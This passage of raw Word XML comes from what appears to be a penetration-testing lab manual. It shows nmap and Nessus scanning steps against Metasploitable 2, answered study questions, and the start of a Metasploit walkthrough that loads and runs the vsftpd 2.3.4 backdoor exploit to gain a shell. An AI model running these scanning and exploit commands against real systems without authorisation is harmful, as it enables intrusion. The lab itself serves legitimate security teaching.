                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A common beginner error here is running </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">theHarvester</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">/dorking against a real, unauthorised organisation's domain “just to see” — always use a domain you own, a designated practice/test domain, or stay strictly within whatever target your instructor has authorised.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 2 — Active Scanning and Vulnerability Assessment (Est. 4 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conduct comprehensive Nmap scanning against Metasploitable 2 and run a Nessus vulnerability scan; build a prioritised finding list.</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2144"/>
        <w:gridCol w:w="7602"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Kali Linux to Metasploitable 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, Nessus Essentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run a full TCP port sweep: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p- -T4 &lt;target-ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find every open TCP port.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run service/version detection and OS fingerprinting on discovered ports: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -O -p&lt;ports&gt; &lt;target-ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run a default and vulnerability NSE sweep: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sC --script=vuln -p&lt;ports&gt; &lt;target-ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch Nessus Essentials (https://localhost:8834), create a Basic Network Scan against the target IP, and run it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Export the Nessus report and build a prioritised finding table: Finding, CVSS, Verified (Y/N), Priority.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">□ Illustrative Output (not an actual captured run)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PORT     STATE SERVICE     VERSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">21/tcp   open  ftp         vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">22/tcp   open  ssh         OpenSSH 4.7p1 Debian</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">80/tcp   open  http        Apache httpd 2.2.8</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation Questions — Answered</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q1. Nessus gives CVSS 9.8 for a finding — does that automatically make it top priority? What other factors matter?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">No. CVSS reflects theoretical severity assuming the attack is possible, not confirmed exploitability on this specific target. Priority should also weigh: whether the finding was manually verified (not a false positive), network exposure (internet-facing vs internal-only), whether compensating controls already reduce real risk, and the business value of the affected asset. A 9.8 behind several layers of internal segmentation may be a lower practical priority than a verified 7.5 directly reachable from the internet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q2. What is the difference between a vulnerability scan and a penetration test?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A vulnerability scan is automated and broad, using tools like Nessus to identify and list potential weaknesses by matching service banners/responses against known signatures, without actively exploiting them. A penetration test goes further, manually exploiting selected weaknesses to prove real, demonstrable impact — exactly what Practical 3 onward will do with the findings from this practical.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 3 — Exploitation with Metasploit Framework (Est. 5 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gain a Meterpreter shell on Metasploitable 2 using a known exploit; execute post-exploitation commands.</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2144"/>
        <w:gridCol w:w="7602"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Kali Linux to Metasploitable 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for the vsftpd backdoor module: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search vsftpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Load it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the target: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS &lt;target-ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to confirm settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the exploit: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
